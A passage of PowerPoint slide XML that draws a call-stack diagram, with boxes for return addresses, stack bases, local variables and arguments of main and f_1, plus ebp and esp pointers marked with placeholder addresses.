                    <a:schemeClr val="dk2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                  <a:headEnd type="none" w="med" len="med"/>
                  <a:tailEnd type="triangle" w="med" len="med"/>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="421" name="组合 420">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9670740-D52C-4BE7-85D4-F34660DD3383}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3692616" y="2673726"/>
                <a:ext cx="1329555" cy="329765"/>
                <a:chOff x="6615347" y="314342"/>
                <a:chExt cx="1329555" cy="329765"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="422" name="Shape 636">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB1A89AB-5CBE-49F9-A605-F20D3CF7ED1A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6660358" y="314342"/>
                  <a:ext cx="1284544" cy="329765"/>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000" dirty="0">
                      <a:latin typeface="Consolas"/>
                      <a:ea typeface="Consolas"/>
                      <a:cs typeface="Consolas"/>
                      <a:sym typeface="Consolas"/>
                    </a:rPr>
                    <a:t>addr14</a:t>
                  </a:r>
                  <a:endParaRPr sz="1000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="423" name="Shape 640">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00C29647-2DB7-4054-9F54-1E23D0E433ED}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6615347" y="549695"/>
                  <a:ext cx="674457" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="dk2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                  <a:headEnd type="none" w="med" len="med"/>
                  <a:tailEnd type="triangle" w="med" len="med"/>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="424" name="组合 423">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE96682A-4BAE-4B91-845B-5BF79DBA68AD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3692616" y="3092510"/>
                <a:ext cx="1329555" cy="341023"/>
                <a:chOff x="6615347" y="303083"/>
                <a:chExt cx="1329555" cy="341023"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="425" name="Shape 636">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42B34652-8FE7-4053-B25F-AABB5DE1CFB1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6660358" y="303083"/>
                  <a:ext cx="1284544" cy="341023"/>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000" dirty="0">
                      <a:latin typeface="Consolas"/>
                      <a:ea typeface="Consolas"/>
                      <a:cs typeface="Consolas"/>
                      <a:sym typeface="Consolas"/>
                    </a:rPr>
                    <a:t>addr12</a:t>
                  </a:r>
                  <a:endParaRPr sz="1000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="426" name="Shape 640">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4D31218-82C2-4167-A9BD-B43601ED7287}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6615347" y="549695"/>
                  <a:ext cx="674457" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="dk2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                  <a:headEnd type="none" w="med" len="med"/>
                  <a:tailEnd type="triangle" w="med" len="med"/>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="93" name="组合 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA030EE4-B2F3-4061-81C6-92A43B8A6B89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3767641" y="4796321"/>
            <a:ext cx="4239309" cy="1955322"/>
            <a:chOff x="7911011" y="2658352"/>
            <a:chExt cx="4233486" cy="2034379"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="矩形 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A1940AA-2F57-4419-87DA-D369FFCA5535}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7911011" y="2658352"/>
              <a:ext cx="4233486" cy="2034379"/>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4" name="组合 83">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB739CA3-DA60-4ED9-8CEF-4530952ADF1D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7915567" y="2695988"/>
              <a:ext cx="4184100" cy="1996743"/>
              <a:chOff x="7733261" y="4414105"/>
              <a:chExt cx="4121611" cy="1996743"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="60" name="组合 59">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB90F234-B8FE-4F3C-9824-BDD2ECFD52EC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7733261" y="4414105"/>
                <a:ext cx="3704170" cy="1996743"/>
                <a:chOff x="7519520" y="4047184"/>
                <a:chExt cx="3704170" cy="1996743"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="276" name="组合 275">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47EAB163-116F-4364-9900-C4ADA11C624B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="7519520" y="4047184"/>
                  <a:ext cx="3704170" cy="1996743"/>
                  <a:chOff x="3789857" y="2500514"/>
                  <a:chExt cx="3704170" cy="1996743"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="284" name="组合 283">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EC20AE8-5C58-441A-AE97-8ACA145A0FFD}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvGrpSpPr/>
                  <p:nvPr/>
                </p:nvGrpSpPr>
                <p:grpSpPr>
                  <a:xfrm>
                    <a:off x="3789857" y="2500514"/>
                    <a:ext cx="3704170" cy="1921721"/>
                    <a:chOff x="6964304" y="361194"/>
                    <a:chExt cx="3683420" cy="2377483"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="286" name="Shape 631">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78134811-1D2A-4391-93EF-B198248B977C}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvSpPr/>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="9355024" y="623969"/>
                      <a:ext cx="1292700" cy="276287"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:solidFill>
                      <a:schemeClr val="accent5">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="4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200" b="1" dirty="0"/>
                        <a:t>ebp = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>addr15</a:t>
                      </a:r>
                    </a:p>
                  </p:txBody>
                </p:sp>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="287" name="Shape 631">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4AA806B-A74A-4C17-88EA-15747460AA3C}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvSpPr/>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="9354890" y="1209592"/>
                      <a:ext cx="1280003" cy="240625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:solidFill>
                      <a:schemeClr val="accent5">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200" b="1" dirty="0"/>
                        <a:t>esp = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>addr13</a:t>
                      </a:r>
                    </a:p>
                  </p:txBody>
                </p:sp>
                <p:grpSp>
                  <p:nvGrpSpPr>
                    <p:cNvPr id="288" name="组合 287">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D366B92-C715-4435-B049-6583CDF6DB29}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvGrpSpPr/>
                    <p:nvPr/>
                  </p:nvGrpSpPr>
                  <p:grpSpPr>
                    <a:xfrm>
                      <a:off x="6964304" y="361194"/>
                      <a:ext cx="2390721" cy="2377483"/>
                      <a:chOff x="6964304" y="361194"/>
                      <a:chExt cx="2390721" cy="2377483"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:cxnSp>
                    <p:nvCxnSpPr>
                      <p:cNvPr id="289" name="Shape 640">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{492D1763-6C48-4B97-BF51-052EBF91E2DD}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvCxnSpPr>
                        <a:cxnSpLocks/>
                      </p:cNvCxnSpPr>
                      <p:nvPr/>
                    </p:nvCxnSpPr>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="6964304" y="898748"/>
                        <a:ext cx="686232" cy="0"/>
                      </a:xfrm>
                      <a:prstGeom prst="straightConnector1">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="9525" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>
                        </a:solidFill>
                        <a:prstDash val="solid"/>
                        <a:round/>
                        <a:headEnd type="none" w="med" len="med"/>
                        <a:tailEnd type="triangle" w="med" len="med"/>
                      </a:ln>
                    </p:spPr>
                  </p:cxnSp>
                  <p:cxnSp>
                    <p:nvCxnSpPr>
                      <p:cNvPr id="290" name="Shape 640">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBEA1D95-1583-4472-BC1B-92B04DD00E03}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvCxnSpPr>
                        <a:cxnSpLocks/>
                      </p:cNvCxnSpPr>
                      <p:nvPr/>
                    </p:nvCxnSpPr>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="6974407" y="2207684"/>
                        <a:ext cx="686232" cy="0"/>
                      </a:xfrm>
                      <a:prstGeom prst="straightConnector1">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="9525" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>
                        </a:solidFill>
                        <a:prstDash val="solid"/>
                        <a:round/>
                        <a:headEnd type="none" w="med" len="med"/>
                        <a:tailEnd type="triangle" w="med" len="med"/>
                      </a:ln>
                    </p:spPr>
                  </p:cxnSp>
                  <p:grpSp>
                    <p:nvGrpSpPr>
                      <p:cNvPr id="294" name="组合 293">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3BD336A-EED7-4A0C-AA93-14EC82E69044}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvGrpSpPr/>
                      <p:nvPr/>
                    </p:nvGrpSpPr>
                    <p:grpSpPr>
                      <a:xfrm>
                        <a:off x="7053807" y="361194"/>
                        <a:ext cx="2301218" cy="2377483"/>
                        <a:chOff x="7053807" y="361194"/>
                        <a:chExt cx="2301218" cy="2377483"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="295" name="Shape 636">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F120EB75-DF95-4DB5-AFA4-9DC5D45FA803}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr/>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr>
                        <a:xfrm>
                          <a:off x="7053807" y="594312"/>
                          <a:ext cx="1277850" cy="413472"/>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000" dirty="0">
                              <a:latin typeface="Consolas"/>
                              <a:ea typeface="Consolas"/>
                              <a:cs typeface="Consolas"/>
                              <a:sym typeface="Consolas"/>
                            </a:rPr>
                            <a:t>addr15</a:t>
                          </a:r>
                          <a:endParaRPr sz="1000" dirty="0">
                            <a:latin typeface="Consolas"/>
                            <a:ea typeface="Consolas"/>
                            <a:cs typeface="Consolas"/>
                            <a:sym typeface="Consolas"/>
                          </a:endParaRPr>
                        </a:p>
                      </p:txBody>
                    </p:sp>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="296" name="Shape 636">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CB8D51C-9169-434F-BCE1-FEEEC865E56D}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr/>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr>
                        <a:xfrm>
                          <a:off x="7053807" y="1914729"/>
                          <a:ext cx="1280003" cy="413967"/>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000" dirty="0">
                              <a:latin typeface="Consolas"/>
                              <a:ea typeface="Consolas"/>
                              <a:cs typeface="Consolas"/>
                              <a:sym typeface="Consolas"/>
                            </a:rPr>
                            <a:t>addr11</a:t>
                          </a:r>
                          <a:endParaRPr sz="1000" dirty="0">
                            <a:latin typeface="Consolas"/>
                            <a:ea typeface="Consolas"/>
                            <a:cs typeface="Consolas"/>
                            <a:sym typeface="Consolas"/>
                          </a:endParaRPr>
                        </a:p>
                      </p:txBody>
                    </p:sp>
                    <p:grpSp>
                      <p:nvGrpSpPr>
                        <p:cNvPr id="298" name="组合 297">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D354A2DF-0644-471B-B824-B98B6EC299A2}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvGrpSpPr/>
                        <p:nvPr/>
                      </p:nvGrpSpPr>
                      <p:grpSpPr>
                        <a:xfrm>
                          <a:off x="7650535" y="361194"/>
                          <a:ext cx="1704490" cy="2377483"/>
                          <a:chOff x="7650535" y="361194"/>
                          <a:chExt cx="1704490" cy="2377483"/>
                        </a:xfrm>
                      </p:grpSpPr>
                      <p:sp>
                        <p:nvSpPr>
                          <p:cNvPr id="300" name="Shape 621">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9233D8C0-94BE-4566-A3BE-06CA7F93ABF1}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvSpPr/>
                          <p:nvPr/>
                        </p:nvSpPr>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="7650535" y="361194"/>
                            <a:ext cx="1704489" cy="270722"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="accent5">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en-US" altLang="zh-CN" sz="1000" b="1" dirty="0"/>
                              <a:t>Return address</a:t>
                            </a:r>
                            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                              <a:solidFill>
                                <a:schemeClr val="accent5"/>
                              </a:solidFill>
                            </a:endParaRPr>
                          </a:p>
                        </p:txBody>
                      </p:sp>
                      <p:sp>
                        <p:nvSpPr>
                          <p:cNvPr id="301" name="Shape 647">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6D531FB-99B4-4754-8F97-42CFCD9DE50C}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvSpPr/>
                          <p:nvPr/>
                        </p:nvSpPr>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="7650535" y="631128"/>
                            <a:ext cx="1704489" cy="270722"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="accent6">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000" b="1" dirty="0">
                                <a:solidFill>
                                  <a:schemeClr val="accent5"/>
                                </a:solidFill>
                              </a:rPr>
                              <a:t>main</a:t>
                            </a:r>
                            <a:r>
                              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0"/>
                              <a:t>’s stackbase</a:t>
                            </a:r>
                            <a:endParaRPr sz="1000" b="1" dirty="0"/>
                          </a:p>
                        </p:txBody>
                      </p:sp>
                      <p:sp>
                        <p:nvSpPr>
                          <p:cNvPr id="302" name="Shape 648">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3C61100-FE2D-4B30-AB60-5EA86AC64C4F}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvSpPr/>
                          <p:nvPr/>
                        </p:nvSpPr>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="7650535" y="1177476"/>
                            <a:ext cx="1704489" cy="270721"/>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b="1" dirty="0"/>
                              <a:t>arg1_m~arg1_1</a:t>
                            </a:r>
                            <a:endParaRPr lang="en" sz="1000" b="1" dirty="0"/>
                          </a:p>
                        </p:txBody>
                      </p:sp>
                      <p:sp>
                        <p:nvSpPr>
                          <p:cNvPr id="303" name="Shape 620">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BFFFD98-540A-48D9-8C83-8A5536C4F119}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvSpPr/>
                          <p:nvPr/>
                        </p:nvSpPr>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="7650535" y="1689232"/>
                            <a:ext cx="1704490" cy="270721"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="accent5">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altLang="zh-CN" sz="1000" b="1" dirty="0"/>
                              <a:t>Return address = </a:t>
                            </a:r>
                            <a:r>
                              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                                <a:solidFill>
                                  <a:srgbClr val="FF0000"/>
                                </a:solidFill>
                              </a:rPr>
                              <a:t>addr1</a:t>
                            </a:r>
                          </a:p>
                        </p:txBody>
                      </p:sp>
                      <p:sp>
                        <p:nvSpPr>
                          <p:cNvPr id="304" name="Shape 649">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCE1E235-9A57-4A48-AA9E-B4B05002FF52}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvSpPr/>
                          <p:nvPr/>
                        </p:nvSpPr>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="7650535" y="1958829"/>
                            <a:ext cx="1704489" cy="267375"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="accent6">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000" b="1" dirty="0">
                                <a:solidFill>
                                  <a:schemeClr val="accent5"/>
                                </a:solidFill>
                              </a:rPr>
                              <a:t>f_1</a:t>
                            </a:r>
                            <a:r>
                              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0"/>
                              <a:t>’s stackbase = </a:t>
                            </a:r>
                            <a:r>
                              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                                <a:solidFill>
                                  <a:srgbClr val="FF0000"/>
                                </a:solidFill>
                              </a:rPr>
                              <a:t>addr15 </a:t>
                            </a:r>
                            <a:endParaRPr sz="1000" b="1" dirty="0">
                              <a:solidFill>
                                <a:srgbClr val="FF0000"/>
                              </a:solidFill>
                            </a:endParaRPr>
                          </a:p>
                        </p:txBody>
                      </p:sp>
                      <p:sp>
                        <p:nvSpPr>
                          <p:cNvPr id="305" name="Shape 650">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF7B6ED-662D-4FD1-86F7-A4DE224C8376}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvSpPr/>
                          <p:nvPr/>
                        </p:nvSpPr>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="7650535" y="2206538"/>
                            <a:ext cx="1704489" cy="267376"/>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b="1" dirty="0">
                                <a:solidFill>
                                  <a:schemeClr val="accent5"/>
                                </a:solidFill>
                              </a:rPr>
                              <a:t>f_1</a:t>
                            </a:r>
                            <a:r>
                              <a:rPr lang="en-US" sz="1000" b="1" dirty="0"/>
                              <a:t>’s local variables</a:t>
                            </a:r>
                            <a:endParaRPr sz="1000" b="1" dirty="0">
                              <a:solidFill>
                                <a:schemeClr val="accent5"/>
                              </a:solidFill>
                            </a:endParaRPr>
                          </a:p>
                        </p:txBody>
                      </p:sp>
                      <p:sp>
                        <p:nvSpPr>
                          <p:cNvPr id="306" name="Shape 651">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{186ED690-BDAD-48A3-A161-B35CCF5519E2}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvSpPr/>
                          <p:nvPr/>
                        </p:nvSpPr>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="7650535" y="2476255"/>
                            <a:ext cx="1704489" cy="262422"/>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000" b="1" dirty="0"/>
                              <a:t>arg_k~arg_i</a:t>
                            </a:r>
                          </a:p>
                        </p:txBody>
                      </p:sp>
                      <p:sp>
                        <p:nvSpPr>
                          <p:cNvPr id="307" name="Shape 650">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0472D004-F6DF-4E99-A4CF-14999228B4B6}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvSpPr/>
                          <p:nvPr/>
                        </p:nvSpPr>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="7650535" y="902597"/>
                            <a:ext cx="1704489" cy="272859"/>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000" b="1" dirty="0">
                                <a:solidFill>
                                  <a:schemeClr val="accent5"/>
                                </a:solidFill>
                              </a:rPr>
                              <a:t>main</a:t>
                            </a:r>
                            <a:r>
                              <a:rPr lang="en-US" sz="1000" b="1" dirty="0"/>
                              <a:t>’s local variables</a:t>
                            </a:r>
                            <a:endParaRPr sz="1000" b="1" dirty="0">
                              <a:solidFill>
                                <a:schemeClr val="accent5"/>
                              </a:solidFill>
                            </a:endParaRPr>
                          </a:p>
                        </p:txBody>
                      </p:sp>
                    </p:grpSp>
                  </p:grpSp>
                </p:grpSp>
              </p:grpSp>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="278" name="组合 277">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F328C21B-EC52-4FDE-A733-64EC1FC83F80}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvGrpSpPr/>
                  <p:nvPr/>
                </p:nvGrpSpPr>
                <p:grpSpPr>
                  <a:xfrm>
                    <a:off x="3800017" y="4207317"/>
                    <a:ext cx="1367062" cy="289940"/>
                    <a:chOff x="6974463" y="2042620"/>
                    <a:chExt cx="1367062" cy="289940"/>
